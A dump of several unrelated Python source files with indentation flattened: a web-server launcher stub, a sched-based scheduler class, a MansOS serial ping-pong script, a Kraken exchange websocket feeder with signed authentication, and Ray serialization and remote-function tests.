if len(sys.argv)<2:
sys.exit()
web_module_name, web_application_name = sys.argv[1].split(":")
web_module = __import__(web_module_name)
web_application = getattr(web_module, web_application_name)
app = web_application()
server = HTTPServer(app)
server.bind(("", 8000))
server.start()
if __name__ == "__main__":
main()
|
scheduler.py
|
import sched
import time
import datetime
import threading
class Scheduler:
def __init__(self, timef=time.time, delayf=time.sleep):
# Declaration
self.__sched_obj = None
# Initialization
self.__sched_obj = sched.scheduler(timef, delayf)
def show(self):
print('*' * 20)
print('Total Event Number: {0:d}\n'.format(
len(self.__sched_obj.queue)))
for index, item in enumerate(self.__sched_obj.queue):
print('Event {0:d} {1}'.format(index, item))
print('*' * 20)
# @instance: would be date or delta timesec
# @argv: would be tuple as a pointer. It's quite similar with pthead_create
def regist(self, instance, act, argv, prio=0):
if isinstance(instance, datetime.datetime):
self.__sched_obj.enterabs(instance.timestamp(), prio, act, argv)
else: # include type of time.time
# Prototype: sched.enter(timesec, prio, act, *argv, **kwarg)
self.__sched_obj.enter(instance, prio, act, argv)
def cancel(self, event_index):
self.__sched_obj.cancel(self.__sched_obj.queue[event_index])
def run(self, blocking=True):
self.__sched_obj.run(blocking)
def daemon(self, blocking=True):
thrd = threading.Thread(target=self.run, args=[blocking])
thrd.start()
|
pingpong-serial.py
|
#!/usr/bin/python
# use serial python lib included in MansOS
import sys
sys.path.append('../../../mos/make/scripts')
import serial
import threading
import random
import time
baudRate = 38400
try:
ser = serial.Serial(
port='/dev/ttyUSB0',
baudrate=baudRate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
except serial.serialutil.SerialException, ( msg ):
print "\nSerial exception:\n\t", msg
flDone = True
def main():
global flDone, ser
flDone = False
print "MansOS serial Ping-Pong"
print "It sends random binary values to the mote, it sends back"
print "messages of form \"Pong <x>\", where <x> is the value sent"
print "Mote also sends \"Ping <y>\" periodically, where <y> is it's local counter"
threading.Thread(target=listenSerial).start()
threading.Thread(target=sendSerial).start()
#Keyboard scanning loop
while (not flDone):
try:
s = raw_input()
except:
print "\nKeyboard interrupt"
flDone = True
return 0
if s == 'q' :
flDone = True
return 0
def listenSerial():
global flDone, ser
print "Listening to serial port: ", ser.portstr, ", rate: ", baudRate
while (not flDone):
s = ser.read(1)
sys.stdout.write( s )
sys.stdout.flush()
print "\nDone"
ser.close()
return 0
def sendSerial():
global ser
random.seed();
while (not flDone):
b = random.randint(1, 9)
# send 5 bytes containing the same digit and the newline
s = str(b) + str(b) + str(b) + str(b) + str(b) + "\n"
print "-- sending " + s
ser.write(s);
time.sleep(random.randint(1,3))
return 0
if __name__ == "__main__":
main()
|
kraken_feeder.py
|
import base64
import hashlib
import hmac
import json
import sys
import os
import threading
import time
import urllib.request
from datetime import datetime
from websocket import create_connection
import logging
from tradingkit.data.feed.feeder import Feeder
from tradingkit.pubsub.core.publisher import Publisher
from tradingkit.pubsub.event.book import Book
from tradingkit.pubsub.event.candle import Candle
from tradingkit.pubsub.event.order import Order
from tradingkit.pubsub.event.trade import Trade
class KrakenFeeder(Feeder, Publisher):
# Converts symbols from normal to kraken vocab
DENORMALIZED_SYMBOL = {
"BTC/EUR": "XBT/EUR",
"BTC/USD": "XBT/USD",
"BTC/USDT": "XBT/USDT",
"ETH/BTC": "ETH/XBT",
}
# Converts symbols from kraken to normal vocab
NORMALIZED_SYMBOL = {
"XBT/EUR": "BTC/EUR",
"XBT/USD": "BTC/USD",
"XBT/USDT": "BTC/USDT",
"ETH/XBT": "ETH/BTC",
}
orderbooks = {}
def __init__(self, credentials=None, ignore_outdated=False, pair=None):
super().__init__()
if pair is None:
pair = {'symbol': 'BTC/EUR'}
self.public_ws = None
self.private_ws = None
if credentials is not None:
if ('apiKey' and 'secret') not in credentials:
raise KeyError("credentials must contain apiKey and secret")
self.credentials = credentials
self.symbol = self.DENORMALIZED_SYMBOL[pair['symbol']] # used to send requests to kraken
self.on_open()
self.ignore_outdated = ignore_outdated
self.lock = None
self.candle = {'id': '', 'data': {}}
def authenticate(self):
api_nonce = bytes(str(int(time.time() * 1000)), "utf-8")
api_request = urllib.request.Request("https://api.kraken.com/0/private/GetWebSocketsToken",
b"nonce=%s" % api_nonce)
api_request.add_header("API-Key", self.credentials['apiKey'])
api_request.add_header("API-Sign", base64.b64encode(hmac.new(base64.b64decode(self.credentials['secret']),
b"/0/private/GetWebSocketsToken" + hashlib.sha256(
api_nonce + b"nonce=%s" % api_nonce).digest(),
hashlib.sha512).digest()))
resp = json.loads(urllib.request.urlopen(api_request).read())
if 'result' in resp and 'token' in resp['result']:
resp = resp['result']['token']
return resp
def on_open(self):
api_domain = "wss://ws.kraken.com/"
auth_api_domain = "wss://ws-auth.kraken.com"
try:
self.public_ws = create_connection(api_domain)
except Exception as error:
logging.info("WebSocket connection failed (%s)" % error)
time.sleep(600)
self.on_open()
try:
self.private_ws = create_connection(auth_api_domain)
except Exception as error:
logging.info("WebSocket connection failed (%s)" % error)
time.sleep(600)
self.on_open()
token = self.authenticate()
self.subscribe(token)
def subscribe(self, token):
api_feed = "book"
api_depth = 10
book_feed = '{"event":"subscribe", "subscription":{"name":"%(feed)s", "depth":%(depth)s}, "pair":["%(symbol)s"]}' % {
"feed": api_feed, "depth": api_depth, "symbol": self.symbol}
trade_feed = '{"event": "subscribe", "pair": ["%(symbol)s"], "subscription": {"name": "trade", "token": "%(token)s"}}' % {
"symbol": self.symbol, 'token': token}
own_trades_feed = '{"event": "subscribe", "subscription": {"name": "ownTrades","token": "%(token)s"}}' % {
'token': token}
try:
self.public_ws.send(trade_feed)
self.public_ws.send(book_feed)
self.private_ws.send(own_trades_feed)
except Exception as error:
logging.info("Feed subscription failed (%s)" % error)
self.public_ws.close()
self.private_ws.close()
sys.exit(1)
def dispatch_event(self, event):
self.lock.acquire()
self.dispatch(event)
self.lock.release()
def on_message(self, message):
if "ownTrades" in message:
order_data_list = self.transform_order_data(message)
for order_data in order_data_list:
self.dispatch_event(Order(order_data))
elif "book-10" in message:
order_book = self.transform_book_data(message)
self.dispatch_event(Book(order_book))
elif "trade" in message:
trade_data_list = self.transform_trade_data(message)
for trade_data in trade_data_list:
self.dispatch_event(Trade(trade_data))
def run(self, is_private):
if is_private:
_ws = self.private_ws
else:
_ws = self.public_ws
while True:
ws_data = "No Data."
try:
ws_data = _ws.recv()
if ws_data:
message = json.loads(ws_data)
self.on_message(message)
except KeyboardInterrupt:
_ws.close()
sys.exit(0)
except Exception as error:
logging.info("[WebSocket error] %s" % str(error))
logging.info("[WebSocket data] %s" % str(ws_data))
time.sleep(60)
self.on_open()
if is_private:
_ws = self.private_ws
else:
_ws = self.public_ws
def feed(self):
# creating a lock
self.lock = threading.Lock()
# creating threads
public_t = threading.Thread(target=self.run, args=(False,))
private_t = threading.Thread(target=self.run, args=(True,))
# start threads
public_t.start()
private_t.start()
# wait until threads finish their job
public_t.join()
logging.info("[WebSocket data public STOP] %s" % str(public_t))
private_t.join()
logging.info("[WebSocket data private STOP] %s" % str(private_t))
def transform_book_data(self, message):
keys = message[1].keys()
symbol = self.NORMALIZED_SYMBOL[message[-1]]
if "as" in keys:
self.orderbooks[symbol] = {
"bids": [
[
float(message[1]["bs"][0][0]),
float(message[1]["bs"][0][1])
]
],
"asks": [
[
float(message[1]["as"][0][0]),
float(message[1]["as"][0][1])
]
],
"timestamp": int(float(message[1]["as"][0][2]) * 1000),
"symbol": symbol,
'exchange': 'kraken'
}
else:
if "a" in keys:
self.orderbooks[symbol]["asks"] = [
[
float(message[1]["a"][0][0]),
float(message[1]["a"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(message[1]["a"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
if "b" in keys:
self.orderbooks[symbol]["bids"] = [
[
float(message[1]["b"][0][0]),
float(message[1]["b"][0][1])
]
]
self.orderbooks[symbol]["timestamp"] = int(float(message[1]["b"][0][2]) * 1000)
self.orderbooks[symbol]["symbol"] = symbol
self.orderbooks[symbol]["exchange"] = 'kraken'
return self.orderbooks[symbol]
def transform_trade_data(self, message):
trade_data_list = []
symbol = self.NORMALIZED_SYMBOL[message[-1]]
for trade in message[1]:
price = float(trade[0])
amount = float(trade[1])
cost = float(trade[0]) * float(trade[1])
timestamp = int(float(trade[2]) * 1000)
side = 'buy' if trade[3] == 'b' else 'sell'
type = 'market' if trade[4] == 'm' else 'limit'
trade_data = {
'price': price,
'amount': amount,
'cost': cost,
'timestamp': timestamp,
'side': side,
'type': type,
'symbol': symbol,
'exchange': 'kraken'
}
trade_data_list.append(trade_data)
return trade_data_list
def transform_order_data(self, message):
order_data_list = []
ts = time.time()
for dict in message[0]:
for order in dict:
if ts - float(dict[order]['time']) < 10: # filter orders since 10 seg
order_data = {
'id': dict[order]['ordertxid'],
'timestamp': int(float(dict[order]['time']) * 1000),
'lastTradeTimestamp': int(float(dict[order]['time']) * 1000),
'status': 'filled',
'symbol': self.NORMALIZED_SYMBOL[dict[order]['pair']],
'exchange': 'kraken',
'type': dict[order]['ordertype'],
'side': dict[order]['type'],
'price': float(dict[order]['price']),
'amount': float(dict[order]['vol'])
}
order_data_list.append(order_data)
return order_data_list
|
runtest.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import string
import subprocess
import sys
import tempfile
import threading
import time
from collections import defaultdict, namedtuple, OrderedDict
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import pickle
import pytest
import ray
import ray.test.cluster_utils
import ray.test.test_utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different.".format(
obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
}
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3])
]
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = (
[{
obj: obj
} for obj in PRIMITIVE_OBJECTS
if (obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_passing_arguments_by_value(ray_start):
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test subtypes of dictionaries.
value_before = OrderedDict([("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: [], [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
# Test returning custom classes created on workers.
@ray.remote
def g():
return SubQux(), Qux()
subqux, qux = ray.get(g.remote())
assert subqux.objs[2].foo.value == 0
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.init_ray()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert_equal(ray.get(h.remote()), np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
